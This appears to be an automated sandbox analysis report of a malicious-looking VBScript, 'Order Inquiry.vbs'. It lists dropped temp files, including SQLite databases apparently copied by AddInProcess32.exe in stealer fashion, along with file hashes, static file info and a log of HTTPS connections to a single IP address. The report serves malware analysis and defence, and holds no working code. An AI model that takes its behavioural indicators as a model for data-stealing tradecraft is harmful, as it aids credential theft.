C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2h5ze3qi.xk1.ps1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_naao5b22.0uk.psm1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_syl04dt5.dtd.psm1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uu4ycpno.as2.ps1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp1F34.tmp.dat

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp3198.tmp.dat

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp31D7.tmp.dat

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8475592208333753
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOF30AvJ3qj/880C4pwE1:TeAFawNLopFgU10XJBORJ6px4p7
MD5:	BE99679A2B018331EACD3A1B680E3757
SHA1:	6E6732E173C91B0C3287AB4B161FE3676D33449A
SHA-256:	C382A020682EDEE086FBC56D11E70214964D39318774A19B184672E9FD0DD3E0
SHA-512:	9CFE1932522109D73602A342A15B7326A3E267B77FFF0FC6937B6DD35A054BF4C10ED79D34CA38D56330A5B325E08D8AFC786A8514C59ABB896864698B6DE099
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp448A.tmp.dat

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1373607036346451
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
MD5:	64BCCF32ED2142E76D142DF7AAC75730
SHA1:	30AB1540F7909BEE86C0542B2EBD24FB73E5D629
SHA-256:	B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
SHA-512:	0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5604.tmp.dat

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp6720.tmp.dat

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7752.tmp.dat

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.37202887060507356
Encrypted:	false
SSDEEP:	12:TLiN6CZhDu6MvDOF5yEHFxOUwa5qguYZ75fOS2Rccog2IccogL:TLiwCZwE8I6Uwcco5fB2r2oL
MD5:	4D950F6445B3766514BA266D6B1F3325
SHA1:	1C2B99FFD0C9130C0B51DA5349A258CA8B92F841
SHA-256:	765D3A5B0D341DDC51D271589F00426B2531D295CCC2C2DE10FDD4790C796916
SHA-512:	AD0F8D47ABBD2412DC82F292BE5311C474E0B18C1022CAAE351A87ECD8C76A136831D4B5303C91DF0F8E68A09C8554E378191782AA8F142A7351EDB0EEF65A93
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g.....4....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp77A1.tmp.dat

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1373607036346451
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
MD5:	64BCCF32ED2142E76D142DF7AAC75730
SHA1:	30AB1540F7909BEE86C0542B2EBD24FB73E5D629
SHA-256:	B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
SHA-512:	0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA565.tmp.dat

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB97.tmp.dat

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03708713717387235
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxW/Hy4XJwvnzfXfYf6zfTfN/0DApVJCI:58r54w0VW3xW/bXWzvACzbJ0DApVJ
MD5:	85D6E1D7F82C11DAC40C95C06B7B5DC5
SHA1:	96EA790BA7A295D78AD5A5019D7EA5E9E8F4B0BD
SHA-256:	D9AD18D2A91CB42FD55695B562D76337BBB4A6AEB45D28C4554297B4EE0DC800
SHA-512:	5DD2B75138EFB9588E14997D84C23C8225F9BFDCEA6A2A1D542AD2C6728484E7E578F06C4BA238853EAD9BE5F9A7CCCF7B2B49A0583FF93D67F072F2C5165B14
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpC105.tmp.dat

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpC173.tmp.dat

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1209886597424439
Encrypted:	false
SSDEEP:	192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
MD5:	EFD26666EAE0E87B32082FF52F9F4C5E
SHA1:	603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
SHA-256:	67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
SHA-512:	28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpCE79.tmp.dat

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	155648
Entropy (8bit):	0.5407252242845243
Encrypted:	false
SSDEEP:	96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:	7B955D976803304F2C0505431A0CF1CF
SHA1:	E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:	CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:	false
Preview:	SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpDB30.tmp.dat

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	155648
Entropy (8bit):	0.5407252242845243
Encrypted:	false
SSDEEP:	96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:	7B955D976803304F2C0505431A0CF1CF
SHA1:	E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:	CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:	false
Preview:	SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE8C2.tmp.dat

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.3528485475628876
Encrypted:	false
SSDEEP:	12:TLiN6CZhDu6MvDOF5yEHFxOUwa5qguYZ75fOSiPe2d:TLiwCZwE8I6Uwcco5fBtC
MD5:	F2B4FB2D384AA4E4D6F4AEB0BBA217DC
SHA1:	2CD70CFB3CE72D9B079170C360C1F563B6BF150E
SHA-256:	1ECC07CD1D383472DAD33D2A5766625009EA5EACBAEDE2417ADA1842654CBBC8
SHA-512:	48D03991660FA1598B3E002F5BC5F0F05E9696BCB2289240FA8CCBB2C030CDD23245D4ECC0C64DA1E7C54B092C3E60AE0427358F63087018BF0E6CEDC471DD34
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g.....4....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpF3A4.tmp.dat

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1209886597424439
Encrypted:	false
SSDEEP:	192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
MD5:	EFD26666EAE0E87B32082FF52F9F4C5E
SHA1:	603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
SHA-256:	67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
SHA-512:	28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Entropy (8bit):	3.39871661864384
TrID:	Text - UTF-16 (LE) encoded (2002/1) 64.44% MP3 audio (1001/1) 32.22% Lumena CEL bitmap (63/63) 2.03% Corel Photo Paint (41/41) 1.32%
File name:	Order Inquiry.vbs
File size:	240'822 bytes
MD5:	443f85c9a27129786164968923b47193
SHA1:	a45f63374b28561a0152e261bd57e5a2bb9c54f9
SHA256:	f3ff35c81d1f64fe7a0f1fb55e1c732d091b8faedc4fcd35eef9d0afe5455a63
SHA512:	3ef8963f3745ba562da95d7263550d291a86aaefb952373d165972e7d8aea91cf051aaab5949b8d9605897cd6b049674576d9a50453423beba9061f503288eb2
SSDEEP:	3072:nBaHznXmxLLCg5Hmgw/kYFvhte41TdRnTTcQYT2X5K0ybU:Xw/kYFJ5Ky
TLSH:	7834C35263EA4008F2F73F54A9BA55214B3BBDD9AD79CA4D418C296D0BE3940CCB1B73
File Content Preview:	..P.r.i.v.a.t.e. .S.u.b. .S.e.t.D.n.s.P.u.b.l.i.s.h.i.n.g.D.i.s.a.b.l.e.d.(.b.o.o.l.)..... . . . .D.i.m. .o.b.j.S.e.r.v.i.c.e.,. .o.b.j.P.r.o.d.u.c.t..... . . . .D.i.m. .k.m.s.F.l.a.g.,. .l.R.e.t.,. .d.w.V.a.l.u.e......... . . . .O.n. .E.r.r.o.r. .R.e.s.u

File Icon


Icon Hash:	68d69b8f86ab9a86

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 14, 2024 15:15:00.293201923 CEST	49706	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:00.293231964 CEST	443	49706	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:00.293332100 CEST	49706	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:00.386943102 CEST	49706	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:00.386977911 CEST	443	49706	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:00.993308067 CEST	443	49706	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:00.993397951 CEST	49706	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:01.066081047 CEST	49706	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:01.066135883 CEST	443	49706	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:01.066443920 CEST	443	49706	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:01.066509962 CEST	49706	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:01.068896055 CEST	49706	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:01.116504908 CEST	443	49706	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:01.352607012 CEST	443	49706	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:01.352648020 CEST	443	49706	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:01.352694035 CEST	49706	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:01.352709055 CEST	443	49706	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:01.352720022 CEST	443	49706	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:01.352741003 CEST	49706	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:01.352762938 CEST	443	49706	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:01.352763891 CEST	49706	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:01.352772951 CEST	443	49706	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:01.352806091 CEST	49706	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:01.380480051 CEST	443	49706	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:01.380582094 CEST	49706	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:01.380605936 CEST	443	49706	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:01.380655050 CEST	49706	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:01.468863010 CEST	443	49706	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:01.468918085 CEST	443	49706	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:01.468925953 CEST	49706	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:01.468945980 CEST	443	49706	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:01.468957901 CEST	49706	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:01.469001055 CEST	49706	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:01.469007969 CEST	443	49706	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:01.469026089 CEST	443	49706	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:01.469044924 CEST	49706	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:01.469072104 CEST	49706	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:01.469535112 CEST	49706	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:01.469553947 CEST	443	49706	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:03.963193893 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:03.963236094 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:03.963356018 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:03.970993996 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:03.971012115 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:04.579335928 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:04.579432011 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:04.581254005 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:04.581271887 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:04.581520081 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:04.588221073 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:04.632497072 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.280198097 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.280235052 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.280260086 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.280283928 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.280308962 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.280337095 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.280353069 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.280380964 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.280390978 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.280405045 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.280416965 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.280421019 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.280441046 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.333554983 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.333575964 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.380434990 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.396469116 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.396521091 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.396539927 CEST	443	49707	188.114.97.3	192.168.2.8
